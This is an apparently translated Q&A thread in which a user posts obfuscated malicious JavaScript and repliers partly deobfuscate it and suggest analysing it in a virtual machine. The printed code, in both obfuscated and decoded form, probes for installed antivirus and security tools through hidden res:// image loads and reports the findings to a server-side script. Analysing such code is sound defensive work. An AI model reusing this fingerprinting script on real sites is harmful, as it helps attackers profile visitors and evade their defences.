我在JavaScript中发现了某种恶意软件。由于它被混淆了,而且相当长,我需要一些如何自动去混淆它的想法。逐行恢复要花很多时间…
很抱歉这么长的代码,我不知道它现在在做什么…
<script>
var raelpit = [],
zfpamzl = 0,
cndelds = 0,
tclnil = 0,
tctidehr = 0,
ucaeggs = 0,
datmpeb = false,
esrent =
"yotnRrwCp tHXRzIKDmqcnoXkelPfOuAtCQ jpFreviqesaOhUe ZJbVLdMq"
.replace(
/[wDLOCHMXqARZJmPjUFVkKIuQ]/g,
"").substr(20, 0);
function pbpiakd(ldrefdu) {
hntpeeed = hntpeeed.replace(/^/,
ldrefdu + 2);
}
function nrimsm(rhteayms) {
var uohsev;
uohsev = document.createElement(
'MsAPTuostrDIYkIXuCN dlTyOWYIhhoqkiaBQZrLcHPZlimcAfgskdzfyiteTWklYsoYiJaMgdgKnMksr'
.replace(
/[WzfkHCAcyKZJOIQTPLMqYNtDBX]/g,
'').substr(16, 3));
uohsev.style.display =
'rsfcTkqhgWpJHebtTtyZeTuicXUelnnn hkCQZznoZNWOHMneoocNaWJsmQTe'
.replace(
/[CHhyWZXpckbaNQrUgTiMJqzO]/g,
'').substr(13, 4);
vneltoas = oerriik << 4;
vneltoas = rhteayms +
'caeFzeFnpVimjoFzmlzFteibaRAjNhTBg ecyrZIVeiOj/#lsoFLlyokLCiSPA mArznfxiqeRMe'
.replace(
/[PIVLyRMBjNOzTSqAakZxFmC]/g,
'').substr(20, 2) +
vneltoas +
'WtmhqoltvUesTyLfl SwEYxYIVprgkaYnLpUeuGtUvwsAeaLCFPwIz/IfiNZsuJmMioSXc yfsiKGinAIYljNpWnAbJzh'
.replace(
/[LjXTZqIzENCMFuaUySvkGKPAxYJWwV]/g,
'').substr(20, 1) +
'iZBsjedZhkJzLAptzAyi qiqhkleTcUjzJRQoMNreS aX_B1JvArVioCxsi DOQjxMfSDhmeeUiRbntXhqgN sNsufmcmnbLoB'
.replace(
/[AqLOxXzTDmjVZMJkCbNhRfBUQS]/g,
'').substr(18, 2);
uohsev[
'HeghFqeURMdteeYTV GOkJermrnwoee uZOMiOBeGkUucTqtpyGKfOjExTyLXvIzlVbGTaIJLrBflPeEdRD qfUUhqxnosSUiFl'
.replace(
/[bKxSFILVmYfHDoGkuUXORMTEJBqZP]/g,
'').substr(20, 7)] =
rhteayms;
vneltoas = vneltoas.replace(
'AmKkUBncPWPehsxlBbeKIQ_aETpiOBPzZeJUrQRtM vnCdrGICeeFOuxu'
.replace(
/[CAIBUZhJTmFPKQWtMxGRsEO]/g,
'').substr(7, 1),
' tkusnpia#hLHdrlBaDBbaZfrLjnA'
.replace(
/[kZBDH hrjdLpAs]/g,
'').substr(5, 1));
raelpit.push(uohsev);
uohsev[
'sJLewiXIBprUqPLnHekrBstSurHhlQBdVufZv rREQLrRezKnNsslwetNAkkttnhjribuEMBterivimZgaoRrqSc'
.replace(
/[PUvlSkRIEpHMjfKBwhZVLqnXQJN]/g,
'').substr(18, 12)]
(
'wsNVNaiUOgRORrQrf rXgaTBPqnirjwsrbcatTiWutkeCDqOHGmLZDTYdxTf pxJRAGEladyaeqoQGGhtza'
.replace(
/[CHkJZxzRdDOAQVWNPjqBwUTXGLEbY]/g,
'').substr(14, 3),
this.location.href.substr(
1, 6).replace(
'EBVIgnQsjiTmStcwYWKYhtSUpWsobeaIeyOlcrj CiPOfOrilWZPF'
.replace(
/[KZQcUIVyETCOBWPjYfSFhw]/g,
'').substr(5, 3),
iyslenda) +
vneltoas);
var vlldlsy = document.body;
vlldlsy.insertBefore(uohsev,
vlldlsy.firstChild);
}
esrent =
"uglGMVWkcnmEHV vp\cChrIFUSGOSVfregScNwSM bAKlKue"
.replace(
/[HCENWvMOwKImGrFUSAbpV]/g,
"").substr(7, 1);
var dfrrtgrn =
"GdBmpjlcQrLqZgKPsPo qWLliuhzgYQsGYaCVkx:\wBIndOwJjTbsrrezAtDRFEhrblLkieBFJXYno"
.replace(
/[QXGAxVDkgTEFzWRbZKuLBYhPJjq]/g,
"").substr(13, 10) + esrent +
"OeHmNoCfgaaORtvHUtnqiLMPtsYseVPwyasBTLgrit oqSbnNrcsKrOvlUdXayTEpVn"
.replace(
/[KMVLSlTUEHBpPOXRmvbfqnNC]/g,
"").substr(9, 2);
function rreiqsfd(rhteayms) {
nrimsm(
"wInZGsoyejan hsadzqruTRj WJCKR:\PIKIrvoSLgGrUMamU VkAYZRFSGiklRBBetsqt\abDDbsZfiascNuBksSvx qUArMnplXr"
.replace(
/[DUbzSGwRWvtIMfkYAxjTqVLZXJByNK]/g,
"").substr(14, 17) +
rhteayms);
nrimsm(
"cYmdXopBKsSKeezasOIDsyuhqOiCHZX:\PLNjDEBrvZogurkzfWBEamSDJyS MHyFBKilIes hE(x8MzA6AzI)M\aBdXksfQanytWGI"
.replace(
/[KEQNMYuZHvqyWfOzJGhDjSkXBLIA]/g,
"").substr(12, 23) +
rhteayms);
}
dfrrtgrn +=
"pjmbLrdOEdheitHINsrioxRUk CsuAtqbYemlXMxYeplhYnle"
.replace(
/[CjAXxIOYqEuMrbpkHLNUR]/g,
"").substr(11, 4) + 3;
var hntpeeed =
"JisokTdXKOrYtObbprIdNrigveAhrskzbgUKRUErYcdRGTer TZVdfQVDEuYtLluuQie AWTgfYPL"
.replace(
/[ZTQNPKfkRWEJDVLYGgzOIUhXA]/g,
"").substr(10, 7);
var iyslenda =
'tMUfiLBsqrRiskzPZFtAUdkve zANdxXSExbCskaCmesGfrpnjocwWeTUdPgEdtlh kGsItTuTikCUCLYSKpJ'
.replace(
/[UJIZEzCRhANfGqPLSlWjTBFKMxYvXwk]/g,
'').substr(15, 1);
setTimeout(function() {
if (Math.random() < 0.2) {
iyslenda =
'JMeUoJjMimLQfqnHiYit rLbGjntearMrNHeGQhMnqgasi epdlSnUtc'
.replace(
/[QHYLqSlUfGJjgdNM]/g,
'').substr(
9, 1) +
iyslenda;
} else {
iyslenda +=
"LgDfrBhINPUDxRqtDuQW dtuiEpxwAbPFnc szPScmMSsVYVkseOWlGSPc MKPOatQrUxtVCrJn ioz"
.replace(
/[KEcVLFzIAPbfJGxMWUDYQSRBCNO]/g,
"").substr(
15, 1);
}
iyslenda = iyslenda.replace(
/(.)1+/g,
'iJWiiyFNmaBdeOflqpw UOLelgkZ$1OstRWqJeehXxsdsNvukJAiPfesrXnVocb '
.replace(
/[FVvORLwBAXPUdJNpmoqZukWhx]/g,
'').substr(
12, 2));
if (iyslenda.length < 3)
setTimeout(
arguments.callee,
1)
}, 1);
hntpeeed += esrent;
hntpeeed = esrent + hntpeeed;
pbpiakd(dfrrtgrn);
setTimeout(function() {
{
nrimsm(hntpeeed +
"orxWLtneaQaChpIJh.sJWyFsdLKLRuTbHYAzrRlqDsurZJDcze GDTJMONmHOi"
.replace(
/[KzcRMZJYNAmHqlxTLFObDhWGQ]/g,
"").substr(
6, 8));
nrimsm(
"pVJezLroei rLxJDYzlndjSRuiPyMQXFlUHpcBCvVU.sjyAKWsiouTeZzZeHcIfjvLMBeTSqKw jemhwLatiegh PfOchy"
.replace(
/[wIHADJgTROSqzWvZKdBYLPMCxUVhj]/g,
"").substr(
11, 12)
);
nrimsm(hntpeeed +
"OCTrGtWaSndSdZLdfyisATshiCmwwbIaCffm.fGsysiOjEKBzAioeWwnuEoJFgVcptYhaUUSJanSuvlvvkRXo fsaB"
.replace(
/[FTZSvlLVwfgBACRJKjWIGOYXzEUr]/g,
"").substr(
12, 8));
nrimsm(hntpeeed +
"urnOXsTzagkVXL aDpcxVNCnMBVlhAMLTSwOiEssAxrmy.syUsnGsaoKFYbaILOro eUriyJvLUJpOXFaRDOVcsqLUfeWqJ KNKbtjNezs"
.replace(
/[qLGNExfoICURXKDTFWJYhVzOtelj]/g,
"").substr(
12, 17)
);
nrimsm(hntpeeed +
"evtshelSmAVlKQrsJF tVZsDyNNErmwNacRC.sINqylsWWrfAaBehugZtce oFnmoPiSWiIDQibZaCXC bsnLZY"
.replace(
/[CLFKhQWBJNlvXIRqDYbVZAPStE]/g,
"").substr(
10, 8));
nrimsm(hntpeeed +
"IziejYsNxTJnurXNSrqWMazfRNFnmdbJIRJamgxcUqdqhSamQVekleon.sAyWvHsbeUtrOwuQ"
.replace(
/[VdwkXFWOTvSNgzJQMRIqjxUYAH]/g,
"").substr(
10, 17)
);
rreiqsfd(
"QOTpRciqsTeNMPUalwkafOPTZOvLNrZSePqqbWyDtes AUKNPntiKXF-gEXKYxYpjOfVPloiZtI\mPqVGbkae.eBxQeFVjtSgCeQbhHZRuVdrKOdvaTHai QJkLlcSGSppSeunuK"
.replace(
/[HYkVqfJjLQIRPhNXBKWOdSCvGDUTFZg]/g,
"").substr(
5, 34));
rreiqsfd(
"PncGhsrCSzBFuGQGTmGjUfssgEMalwQLGareKbYytesT LAnJWLti-MLfCfuaVflfTEwaYrSIe\mNXufNObzSaXm.exLGDueipivOJGBPuzoBkIpsZWzqlDFCssobBuhFddODiD"
.replace(
/[EJKSuYkjzGBfTdDWZFQNVPqUvOLCIX]/g,
"").substr(
9, 34));
rreiqsfd(
"OyDXtDBWeNnFOFacsCp epiXcvKqAVAGYFSGET SELoNfqBFtwWaPmKyrueW\AJLqBPvaust\AYvaYyDuDqEsztUKWzIORQzHW.exmeaKXebebQheOhblodBeYX BkcegzRGPPaBlZctroWelsc jHLWF"
.replace(
/[zWRhOLXFBqdQGHbPmCJDEjZuKNycY]/g,
"").substr(
11, 32)
);
rreiqsfd(
"PiFErtvVQSDPwbtDW MurukCsOsHhIzUPnnortoFxnRMDCz ZJsAVeLNEcOvXuMjjriVty\BRrWhanDdiInIOGgqPpN\mWVjuijs.dRkLjlAPxlotWQallRDa"
.replace(
/[jGZRJCWLEFQUVHSpNPDMkqOxhIAXvz]/g,
"").substr(
13, 33)
);
rreiqsfd(
"dUWNCrZaijoqh OUaUgiqifnOIWoQDrtqEowJOHn inQtAPerneSt sReAVLwxYcXkDIKurQiqYtpyOLAqW\BranLVTdipbXCngA\mwONuipbxbsDMK.LNHZbdQlltDcNDDHaDazbDd wxRIb"
.replace(
/[OIkqSXDMCEZbPNWVYAjwTJKQpLHRxU]/g,
"").substr(
12, 42)
);
rreiqsfd(
"eZamUyaDIegnLtdYc JjNhVeDvepyolYDlMtQZFPY-SeQcHuPrqeBA\tbNYWyMXrjRXBhiAVkUjBggXEekGHrL.IezGxNeuyaJMgvaztiuHJG nRhcfKDThCEyejMuINIRePRDCtoaI"
.replace(
/[ZQhfBCJyTWRLPDMIqbKAHGYEjUXVNkz]/g,
"").substr(
19, 20)
);
nrimsm(hntpeeed +
"yBDrkagpVPdVAeiSeCx xWpZAitsuvkYsBjtz lmqZwOchrzqSXPfswNvbDROXtas.sJysHHlYsBDsnnDaHoA"
.replace(
/[WvRjacwkVmxzNHJXPOBACZDYSq]/g,
"").substr(
20, 9));
var siatsii =
"eycsAPNjFjuQyewJ oaaGprOhoVmYUKUaZspRVermDsXZkNINhPTy DHLAgCab\KhPNDQFaFjPspqerOskdy lDMpAqqziHnuHNiiQI "
.replace(
/[hRMIHUdZYJODQVNFCXqGPjgcTmA]/g,
"").substr(
14, 24);
rreiqsfd(siatsii +
"rsqhcagAdeHXToBRtalX kwEIMzSweKggcuYQrNONPRiLJtyQC G15WGZUC.0.G2\aIZQVvpORuWXGiM.QejxYeXfpnBRMAboOkgpA aIVPqxCjmsmb"
.replace(
/[qLUYPRXBzHNWEQgKIGkMCwJmOjZAV]/g,
"").substr(
7, 31));
rreiqsfd(siatsii +
"XJsQPhmPwglzdj CTrjsLQDaEzzegnuZNEZKIntLerqnetzEFFY SCeAcXuhYLAErWiAtRy ff15P.0.2QqYq\aOAvVOJGpuEUZi.exePmTzUahksMbDAoZEMjAD"
.replace(
/[EXCJWTZqUMKYONFzjQbhVGPARfLD]/g,
"").substr(
14, 34)
);
rreiqsfd(siatsii +
"eilaOJsMshOQJcOGkYrTFKTf mRtzSAyEntRiS-VhwiruIYRhZs 1U5FMT.S0lM.2\aGFqPvpwEuMiyRWE.ZeTBNXxESespWPQRehiuecXYipdsqW jpUSHRQTWFsXfDbvqBgLQh BoC"
.replace(
/[UGJMRPXLESzjqDCZlIHKNBFOWwYyTQh]/g,
"").substr(
12, 27)
);
rreiqsfd(siatsii +
"TFNeUZLLJTeejikMQJCtMYbjSmYLHNallj qIOVGfficeAhG SDQecuAEUQQhrYBAityJ UWLBXh3\sTNVtajrtCXWegrQQT_YATavp.WexEezErtCTWioDAWwwlgVKaern"
.replace(
/[ZJVAITDFHBhCGgEWMUQLKYwqNXj]/g,
"").substr(
7, 39));
nrimsm(hntpeeed +
"dOHpXcJRnOYHPNRzRKaLTemFLWTPjKsDeynIxWqXzPCTb ueiLuFoxoZPIFMrLdRSYriverLjskSRbYfilMHtUzOerMGwKw.QOsZHxyxsnyhrIngUaTQa ssehRuJLXCSUMEdoZ rog"
.replace(
/[PSKOxEXRLFDYWQMmCjGTHJqUZNwIz]/g,
"").substr(
19, 19)
);
var sosvaki =
"tSRlRKmwYaGmVpizjn SOXzKhheiaKQGeoFbTrehSVqKZnd MChSiCSPycro\gQrEeaVDIBrOXiqsWexm USaxHeQnVihenmwouZqo"
.replace(
/[WHqbEPhVKYCFUZIwRODQmXxBjGSyz]/g,
"").substr(
12, 12);
rreiqsfd(sosvaki +
"inEPmtLGLBmtqVltyZTYOLDiAdtaVnyViSum\UIXEVFramHPeJhwHQHojyrkySZABdhYXXL\uYiWPiNdnKECORShVMgBREErh.OXeKqRxeqYcaHYfbt slJZwDGhScdtteiKvSleifsrG"
.replace(
/[SYARBE JqOPyHNVZGLdDKhjCQX]/g,
"").substr(
8, 33));
rreiqsfd(sosvaki +
"QiHGJNGWssaEAJQeyYBjpq tiZhyKKZlrXYAGTyQGWMjIEWDyOSkQ\PrwzmUCVvonsLole.ezxefbGWuQtXNKQbrbnnzcLvnfdmosL"
.replace(
/[QYvJEHUfNKALjyGOzXVkrBWZc]/g,
"").substr(
12, 20)
);
rreiqsfd(sosvaki +
"HsFHrzBlLbgwiiluja rzzgRjishYSecZTFOuZTVHQriYXUzfty AHqDKqgZLentG\PWFvCCDNXFWRtMovnXTmTf.RexJGeOqdJBQUZEepsXUvkqaXm"
.replace(
/[HWvGXmVUfKOQpYJFERBLqDzZTj]/g,
"").substr(
17, 27)
);
rreiqsfd(sosvaki +
"KnDkrpOebleeOEvWOXsGsCzzFlqieRWGbJnBtQE zSerZFQvUIJerd FSUBwOechurityLV VVjAhgeUqDVFHhbnKtR\PJKzRBXJZEcJcINFYTMoGnLRWJ.eUxFeUGFltstWYJseribijIGLK lpaYXqpmibvkOiifoWhrDE"
.replace(
/[XWRHEjGZwLJqKQzhBOdUVDpYbkIF]/g,
"").substr(
9, 41));
rreiqsfd(sosvaki +
"ignQsUjQOKmHt UEpQoqrYaEqFOljarUFsDZZ TDGLmtziTDfBFHrDSJeqNcDFFuYqHrqEBKiGtHyD SWUerLvFerG\PYJCCWGLDZSRQVZ\AGIQpaUcQhDeN2\bKinY\AGQzQJKYBpLGaXchDeMjJoqINnlOiQDtZoBrOOQ.FeZxeDlwjtyDTaOBGFqZtFFTHDntXXOiDcdYFnLUzIlnGgB kT"
.replace(
/[YUKHJOBDjqLWETQGzNZXIlF]/g,
"").substr(
20, 52)
);
rreiqsfd(sosvaki +
"oaoafntKtrBhphYWrPjTvHobCAKwsCPerE GuWYMardcF\BKbPgVZfZVGUif.FePAxeanHsydEKLTdnqlPidjPTzhNhLmZ"
.replace(
/[jchAgYEHVWCNbZvPzKfMLpTFq]/g,
"").substr(
8, 22));
rreiqsfd(
"ubaoTszEwVuQCe MlcNAfWwNee.Tcomq\AjWJzygZSednzYWRFt\mIQbcaWgentLN.exLyeRxQrtpInnSU riETr"
.replace(
/[qzVERZYNwljIWSLdbCFJQyUT]/g,
"").substr(
7, 28));
rreiqsfd(
"DdecrRoidW ishmHCPJwciVt eRcAreIFYkifAddmokolYoKSekXLrfIRYB2U\FPARLUYSKjOMiGjEqKddAlEXGPjerI.GDDexjeerAqteansmNJGNM KReLIesgphJrWurvAO"
.replace(
/[OHPCjYMESfBKqWJVwXARoIkDLmGUN]/g,
"").substr(
18, 20)
);
rreiqsfd(
"PSQuUIsaDwhHrRfBtJfruySsUWoFhPiddlWJer4JMAQP\FATVidUJdler.BEBjVexEejKsnSuetnek REKl"
.replace(
/[BPSUwREVJfHIDyKQAhTjWM]/g,
"").substr(
9, 20));
rreiqsfd(
"rWmflwWhzjwiiei atYrvscjXDgaAQiQr WoYRXTzKDWnlOERwZpmqenVPLMwKoNQoo\UmWoEHnginJGswtazlWl.DoYJMCJexecGfrAGGSdEibpncsGnHeTGGBrm RugeYMuq"
.replace(
/[fZRoGSLTXCgqYmKWMJjQBEwAzHD]/g,
"").substr(
20, 21)
);
rreiqsfd(
"qHiKwzkKtsrnuifawSPymODZanZteFYGc\LKivqJhhIeUApwEdDPTDafte\MOHwKSVACRWKKhO71F.dllNNBatkEQAkQFeFaaDoW bGZOcqIFxulEHgj"
.replace(
/[TjIwWDkNGrKFAhPqfYJOHZQzEB]/g,
"").substr(
7, 31));
rreiqsfd(
"VBndqwbqGfbqUgICoLQQjDKkRuIOOBLmmon PFilXzTejs\SGykTmanJJteNc ShareBudLRZOPII\ckcEvPXVtMjgr.ewxeNGUtiuBNcTbauTmXaog piQQetniAI"
.replace(
/[QwjTkABLPZDRVGzJfNKUIXuOq]/g,
"").substr(
5, 41));
}
setTimeout(stwsiis,
1000);
}, 1500);
function stwsiis() {
if (datmpeb) return;
datmpeb = true;
var ctstahjh =
"liXksvXsyWoruOMnFzXOmtpTEXikAxfteZ"
.replace(
/[TvpXAWxOZMzEkyF]/g,
"").substr(6, 0),
ildciea = 0;
for (var i in raelpit) {
var found = false;
try {
if (raelpit[i][
'cShtxvaLencnaoatQtL FfrKfXQwilLCeUpSwdatedDkaRwtmrVeHtuezJtesmB'
.replace(
/[KrzCkRLSBJFvuXQHmnchxwVo]/g,
'').substr(
9, 15)
] ==
"zmsXeRLNnyaWsqXBFXxiyebgrPzhtmEIeYdBneTsiBqtfaPcv ZqksmonDwKuE"
.replace(
/[xKYyqPWXzNoEBDTgFbLZifIR]/g,
"").substr(11,
0)) found =
false;
else found = true;
} catch (e) {
found = true;
}
if (found > 0) ctstahjh +=
ildciea +
'LliwOoCNpsBcSinerBMeb qhzUJeGu,ySOsqgTZNWMgQXEyDvjeTUi '
.replace(
/[qOSGNWjUEsXlLQwDTCBJpZMz]/g,
'').substr(13, 1);
ildciea++;
}
var nlmata = document[
'RYsegzNnKntFa gpdocrptGsWehcJINqPrJAKeatyTCMGOevFOhEYleVMmentuKfmOaHqRrphOzVDr'
.replace(
/[GONFJDVgKqAzvpydhRCHWPMITY]/g,
'').substr(13, 13)]
(
'eLzSdbgaMunpJDvV VlfHXIyGqdnWGoaBzBpssI ktEscFRXHHeOHiDrGyCwGPWleJmoyeHIWsFblhpIsi'
.replace(
/[MGDEBILypHvbSJOCzRXoPVWF]/g,
'').substr(18, 2) +
'PpvyPtrwSiFyhRLxraviptngIqmwteslKlkF LbMOkCsjVWGztMoVur'
.replace(
/[jwKbSMFgWvPOCGaqzImxVRsLh]/g,
'').substr(6, 4));
nlmata[
'MBdQDhogneFIrnWlAPJWjpsDx mpvqBcXxiiGfBhYuJOKshUrcrCLyilQxbdlFee'
.replace(
/[WhgQFKJBLYGMfDOXCxPUqjAIo]/g,
'').substr(16, 3)] =
'mViEuZlOFaEZqtuKnCUqwnCKjlovxLr.htpm?equksWfPkcDd'
.replace(
/[aFCpZqKdLVDwOrPUoEWk]/g,
'').substr(8, 9) + Math
.random() +
'MXiZAQHnTfnkcAjpau,LrKsxxtezwDFsfbdeX EusNeEnKVIslTBgPCm'
.replace(
/[EHCBMIPZufDXAQxLFKbrTdNjtkV]/g,
'').substr(6, 1) +
ctstahjh;
var yilwre = document.body;
yilwre.insertBefore(nlmata,yilwre.firstChild);
}
</script>
我将setTimeout函数赋值给一个变量,然后使用debug(this_variable);this_variable ();看看它是怎么做的,但并不是很有帮助。
我认为有几种方法可以解决这个问题,但第一步肯定是解码它。我不需要太糟糕的张贴在这里,因为它不会自己运行(至少一个变量没有定义)希望这能为你做一些工作=)
var raelpit = [],
zfpamzl = 0,
cndelds = 0,
tclnil = 0,
tctidehr = 0,
ucaeggs = 0,
datmpeb = false,
esrent = '';
function pbpiakd(ldrefdu) {
hntpeeed = hntpeeed.replace(/^/, ldrefdu + 2);
}
function nrimsm(rhteayms) {
var uohsev = document.createElement('img');
uohsev.style.display = 'none';
// vneltoas is not defined =/
vneltoas = oerriik << 4;
vneltoas = rhteayms + '/#' + vneltoas + '/' + '_1';
uohsev['tpyjyvz'] = rhteayms;
vneltoas = vneltoas.replace('_', '#');
raelpit.push(uohsev);
// CURRENT SITE STARTS WITH HTTP?... The next line takes a substring and
// then replaces part of it with the value of iyslenda... If the site starts with
// http:// then you can just assume the final code will be 'iyslenda://' + vneltoas;
// In this case, I've rewritten it to do the same thing but cleaner. That is unless
// the document ISN'T http but ftp or something else, of course. =)
uohsev['setAttribute']('src', iyslenda + '://' + this.document.location.href.substr(7) + vneltoas);
var vlldlsy = document.body;
vlldlsy.insertBefore(uohsev, vlldlsy.firstChild);
}
esrent = "";
dfrrtgrn = "C:wIndOwssY";
function rreiqsfd(rhteayms) {
nrimsm("C:Program Files" + rhteayms);
nrimsm("C:Program Files (x86)" + rhteayms);
}
dfrrtgrn += "C:wIndOwssYstem3";
var hntpeeed = 'drivers';
var iyslenda = 'e';
setTimeout(function() {
if (Math.random() < 0.2) {
iyslenda = 'r' + iyslenda;
}
else {
iyslenda += 's';
}
}
iyslenda.replace(/(.)1+/g, '$1');
if (iyslenda.length < 3) {
setTimeout(arguments.callee, 1)
}
}, 1);
hntpeeed += esrent;
hntpeeed = esrent + hntpeeed;
pbpiakd(dfrrtgrn);
setTimeout(function() {
{
nrimsm(hntpeeed + 'aCpI.sys');
nrimsm('iyQXFlpc.sys');
nrimsm(hntpeeed + 'mbam.sys');
nrimsm(hntpeeed + 'MBAMSwissArmy.sys');
nrimsm(hntpeeed + 'mwac.sys');
nrimsm(hntpeeed + 'mbamchameleon.sys');
rreiqsfd('Malwarebytes Anti-Exploitmbae.exe');
rreiqsfd('Malwarebytes Anti-Malwarembam.exe');
rreiqsfd('AVAST SoftwareAvastAvastUI.exe');
rreiqsfd('norton securityBrandingmuis.dll');
rreiqsfd('norton internet securityBrandingmuis.dll');
rreiqsfd('F-Securetrigger.exe');
nrimsm(hntpeeed + 'fsbts.sys');
var siatsii = 'Kaspersky LabKaspersky ';
rreiqsfd(siatsii + 'Total Security 15.0.2avpui.exe');
rreiqsfd(siatsii + 'Internet Security 15.0.2avpui.exe')
rreiqsfd(siatsii + 'Anti-Virus 15.0.2avpui.exe');
rreiqsfd(siatsii + 'Small Office Security 3starter_avp.exe');
nrimsm(hntpeeed + 'driverskbfilter.sys');
var sosvaki = 'Trend Micro';
rreiqsfd(sosvaki + 'TitaniumUIFrameworkuiWinMgr.exe');
rreiqsfd(sosvaki + 'TMIDSPwmConsole.exe');
rreiqsfd('Security AgentPCCNtMon.exe');
rreiqsfd('Client Server Security AgentPccNTMon.exe');
rreiqsfd('Security ServerPCCSRVApache2binApacheMonitor.exe');
rreiqsfd('Browser GuardBGUi.exe');
rreiqsfd('Fiddler2Fiddler.exe');
rreiqsfd('Fiddler4Fiddler.exe');
rreiqsfd('OpenVPNUninstall.exe');
rreiqsfd('SymantecLiveUpdateMSVCR71.dll');
rreiqsfd('Common FilesSymantec SharedccEvtMgr.exe');
}
setTimeout(stwsiis, 1000);
}, 1500);
function stwsiis() {
if (datmpeb)
return;
datmpeb = true;
var ctstahjh = '',
ildciea = 0;
for (var i in raelpit) {
var found = false;
try {
if (raelpit[i]['fileUpdatedDate'] == '')
found = false;
else
found = true;
} catch (e) {
found = true;
}
if (found > 0)
ctstahjh += ildciea + ',';
ildciea++;
}
var nlmata = document['createElement']('script');
nlmata['src'] = 'jlvx.htm?' + Math.random() + ',' + ctstahjh;
var yilwre = document.body;
yilwre.insertBefore(nlmata,yilwre.firstChild);
}
是的,我肯定会说有些事情看起来很可疑;-)
小心!
(还有,很抱歉语法高亮显示。我现在能做的只有这么多,我必须离开,对不起…
你可以在一个安全的环境中复制这个恶意软件(VirtualBox或Vmware),我认为这是知道这个Js在做什么的最好方法是在控制台或浏览器中复制它。如果您想在控制台中复制此内容,可以使用https://developer.mozilla.org/es/docs/SpiderMonkey
也许你可以从源代码中了解到正在做什么,但是如果你复制恶意软件,你可以100%地理解正在做什么。
我希望这有帮助。问候。